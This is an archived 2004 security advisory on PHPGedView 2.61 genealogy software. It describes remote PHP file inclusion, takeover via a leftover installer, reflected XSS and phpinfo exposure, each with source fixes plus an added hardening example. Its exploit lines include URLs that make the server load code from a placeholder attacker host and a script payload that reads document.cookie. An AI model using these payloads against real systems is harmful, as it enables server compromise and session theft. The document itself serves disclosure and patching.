phpgedview.txt

2004-01-08T00:00:00
ID PACKETSTORM:32471
Type packetstorm
Reporter Vietnamese Security Group
Modified 2004-01-08T00:00:00

Description

                                        
                                            `Tittle : Vuln in PHPGEDVIEW 2.61  
Lang : PHP   
Author : Windak  
Website: www.security.com.vn  
Version : PHPGEDVIEW 2.61 Multi-Problem  
  
Introduction :  
  
PHPGEDVIEW is a program that reads GEDCOM genealogy files and displays them (by default as HTML).  
  
Bug :   
  
1) Php code injection :   
  
Risk : High   
- Vulnerable files : functions.php, authentication_index.php, config_gedcom.php   
  
In authentication_index.php file : at line 33 :   
  
require $PGV_BASE_DIRECTORY."authenticate.php";   
  
In functions.php file : at line 35 :   
  
require($PGV_BASE_DIRECTORY."functions_print.php");   
  
In config_gedcom.php file : at line 115 :   
  
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");   
else {   
$THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";   
require($THEME_DIR."theme.php");   
}   
  
  
Exploit :   
  
http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/   
http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/   
http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/   
  
A script named authenticate.php is placed at http://attacker/ (or functions_print.php, or theme.php placed in the folder /themes/standard/).  
  
FIX : add require("config.php"); as the first line of each vulnerable file.   
  
2) Reconfiguration (reinstall) :   
Risk : Medium   
If editconfig.php was not deleted after installation, an attacker can rerun the installer and change the administrator password.  
Link : http://target/phpgedview_folder/editconfig.php   
Fix : delete the editconfig.php file.  
  
3) XSS :   
Risk : Medium   
  
Exploit :   
http://localhost/phpgedview/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>   
  
fix :   
  
Find :   
<input type="text" name="firstname" value="<?php if ($action=="soundex") print $firstname; ?>" size="20" /></td></tr>   
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>   
<input type="text" name="lastname" value="<?php if ($action=="soundex") print $lastname; ?>" size="20" /></td></tr>   
<tr><td><?php print $pgv_lang["search_place"]?></td><td>   
<input type="text" name="place" value="<?php if ($action=="soundex") print $place; ?>" size="20" /></td></tr>   
<tr><td><?php print $pgv_lang["search_year"]?></td><td>   
<input type="text" name="year" value="<?php if ($action=="soundex") print $year; ?>" size="20" /></td></tr>   
  
replace with :   
  
<input type="text" name="firstname" value="" /></td></tr>   
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>   
<input type="text" name="lastname" value="" /></td></tr>   
<tr><td><?php print $pgv_lang["search_place"]?></td><td>   
<input type="text" name="place" value="" /></td></tr>   
<tr><td><?php print $pgv_lang["search_year"]?></td><td>   
<input type="text" name="year" value="" /></td></tr>   
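The two source-level defects above (an include path built from a request-writable global in bug 1, and a search value printed into an HTML attribute unescaped in bug 3) can be hardened as follows. This is an added example, not PHPGedView's code; the helpers pgv_safe_theme_path and pgv_form_value and the theme request parameter are assumed for illustration.

```php
<?php
// Added hardening example; not PHPGedView's own code. It addresses the two
// source-level defects above: an include path built from a request-writable
// global ($PGV_BASE_DIRECTORY, overwritable via register_globals), and a
// search value printed into an HTML attribute unescaped.

// 1) Pin the include base to this script's own directory rather than a
//    variable a request can overwrite. Deployments should also keep
//    allow_url_fopen off so no include can ever fetch a remote URL.
$pgv_base = dirname(__FILE__) . DIRECTORY_SEPARATOR;

// Resolve a theme name against the pinned base. Anything that is not a
// plain directory under themes/ (a URL, "../", an absent theme) falls
// back to the standard theme. $theme_dir is a hypothetical request value.
function pgv_safe_theme_path($base, $theme_dir) {
    $root = realpath($base . 'themes');
    $candidate = realpath($base . 'themes' . DIRECTORY_SEPARATOR . basename($theme_dir));
    if ($root === false || $candidate === false
        || strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return $base . 'themes' . DIRECTORY_SEPARATOR . 'standard';
    }
    return $candidate;
}

$theme_dir = isset($_GET['theme']) ? $_GET['theme'] : 'standard';
$theme_file = pgv_safe_theme_path($pgv_base, $theme_dir) . DIRECTORY_SEPARATOR . 'theme.php';
if (file_exists($theme_file)) {
    require $theme_file;
}

// 2) Escape user-supplied search values instead of blanking them, so the
//    form still re-populates after a soundex search but a quote or "<" in
//    the value cannot break out of the value="..." attribute.
function pgv_form_value($value) {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

$action    = isset($_GET['action'])    ? $_GET['action']    : '';
$firstname = isset($_GET['firstname']) ? $_GET['firstname'] : '';
$shown = ($action == 'soundex') ? pgv_form_value($firstname) : '';
echo '<input type="text" name="firstname" value="' . $shown . '" size="20" />';
?>
```

The same pgv_form_value() call applies to the lastname, place and year fields, which keeps the search form functional rather than emptying it as the replacement above does.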
  
4) Server information disclosure :   
Risk : Low   
I can display server information.   
Link: http://target/phpgedview_folder/admin.php?action=phpinfo   
  
fix :   
Find :   
  
if (!isset($action)) $action="";   
if ($action=="phpinfo") {   
phpinfo();   
exit;   
}   
  
if (!userIsAdmin(getUserName())) {   
header("Location: login.php?url=admin.php");   
exit;   
}   
  
replace with :   
  
if (!userIsAdmin(getUserName())) {   
header("Location: login.php?url=admin.php");   
exit;   
}   
if (!isset($action)) $action="";   
if ($action=="phpinfo") {   
phpinfo();   
exit;   
}   
  
=======================================================================  
Windak - Vietnamese Security Group  
  
www.security.com.vn   